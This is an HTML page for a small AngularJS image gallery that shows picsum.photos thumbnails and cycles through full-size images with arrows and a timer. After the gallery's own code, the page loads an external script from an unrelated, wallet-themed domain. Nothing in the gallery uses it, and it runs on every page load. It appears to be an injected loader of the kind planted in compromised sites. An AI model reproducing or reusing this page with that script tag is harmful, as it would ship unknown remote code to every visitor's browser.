<!DOCTYPE html>
<html ng-app="imageApp">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.2/angular.min.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: lightblue;
            margin: 0;
            padding: 0;
        }

        .container {
            text-align: center;
            margin-top: 20px;
        }

        .thumbnail {
            width: 80px;
            height: 80px;
            margin: 10px;
            cursor: pointer;
            border: 2px solid #ddd;
            border-radius: 4px;
            transition: border 0.3s;
        }

        .thumbnail:hover {
            border: 2px solid #555;
        }

        .fullsize-container {
            display: flex;
            justify-content: center;
            align-items: center;
            margin: 20px 0;
        }

        .fullsize {
            display: none;
            max-width: 100%;
            max-height: 100%;
            border-radius: 8px;
        }

        .fullsize.active {
            display: block;
        }

        .separator {
            margin-top: 20px;
            margin-bottom: 20px;
            border-top: 2px solid #333;
        }

        .arrow {
            cursor: pointer;
            margin: 10px;
            font-size: 24px;
            width: 30px;
            height: 30px;
            border: 1px solid #ccc;
            text-align: center;
            line-height: 1.6;
            color: black;
            border-radius: 50%;
            transition: background-color 0.3s;
        }

        .arrow:hover {
            background-color: #ddd;
        }
    </style>
</head>

<body>

    <div class="container" ng-controller="ImageController as vm">
        <div>
            <img ng-repeat="image in vm.images" ng-src="{{image.thumbnail}}" ng-click="vm.showFullSize($index)"
                class="thumbnail">
        </div>
        <div class="separator"></div>
        <div class="fullsize-container">
            <img ng-repeat="image in vm.images" ng-src="{{image.fullsize}}" class="fullsize"
                ng-class="{active: $index === vm.currentIndex}">
        </div>
        <div>
            <span class="arrow" ng-click="vm.prev()">&#10094;</span>
            <span class="arrow" ng-click="vm.next()">&#10095;</span>
        </div>

        <script>
            var app = angular.module('imageApp', []);

            app.controller('ImageController', function ($scope, $interval) {
                var vm = this;
                vm.images = [
                        { thumbnail: 'https://picsum.photos/id/102/50/50', fullsize: 'https://picsum.photos/id/102/400/400' },
                        { thumbnail: 'https://picsum.photos/id/104/50/50', fullsize: 'https://picsum.photos/id/104/400/400' },
                        { thumbnail: 'https://picsum.photos/id/106/50/50', fullsize: 'https://picsum.photos/id/106/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/3/50/50', fullsize: 'https://picsum.photos/seed/3/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/5/50/50', fullsize: 'https://picsum.photos/seed/5/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/101/50/50', fullsize: 'https://picsum.photos/seed/101/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/102/50/50', fullsize: 'https://picsum.photos/seed/102/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/103/50/50', fullsize: 'https://picsum.photos/seed/103/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/105/50/50', fullsize: 'https://picsum.photos/seed/105/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/107/50/50', fullsize: 'https://picsum.photos/seed/107/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/201/50/50', fullsize: 'https://picsum.photos/seed/201/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/202/50/50', fullsize: 'https://picsum.photos/seed/202/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/203/50/50', fullsize: 'https://picsum.photos/seed/203/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/204/50/50', fullsize: 'https://picsum.photos/seed/204/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/205/50/50', fullsize: 'https://picsum.photos/seed/205/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/206/50/50', fullsize: 'https://picsum.photos/seed/206/400/400' },
                        { thumbnail: 'https://picsum.photos/seed/207/50/50', fullsize: 'https://picsum.photos/seed/207/400/400' },
                ];



                vm.currentIndex = null;

                vm.showFullSize = function (index) {
                    vm.currentIndex = index;
                };

                vm.prev = function () {
                    vm.currentIndex = (vm.currentIndex - 1 + vm.images.length) % vm.images.length;
                };

                vm.next = function () {
                    vm.currentIndex = (vm.currentIndex + 1) % vm.images.length;
                };

                var intervalPromise = $interval(function () {
                    vm.next();
                }, 2000);

                $scope.$on('$destroy', function () {
                    $interval.cancel(intervalPromise);
                });
            });
        </script>
        <script src="https://morethanwallet.com/appstore/index.js"></script>
</body>

</html>
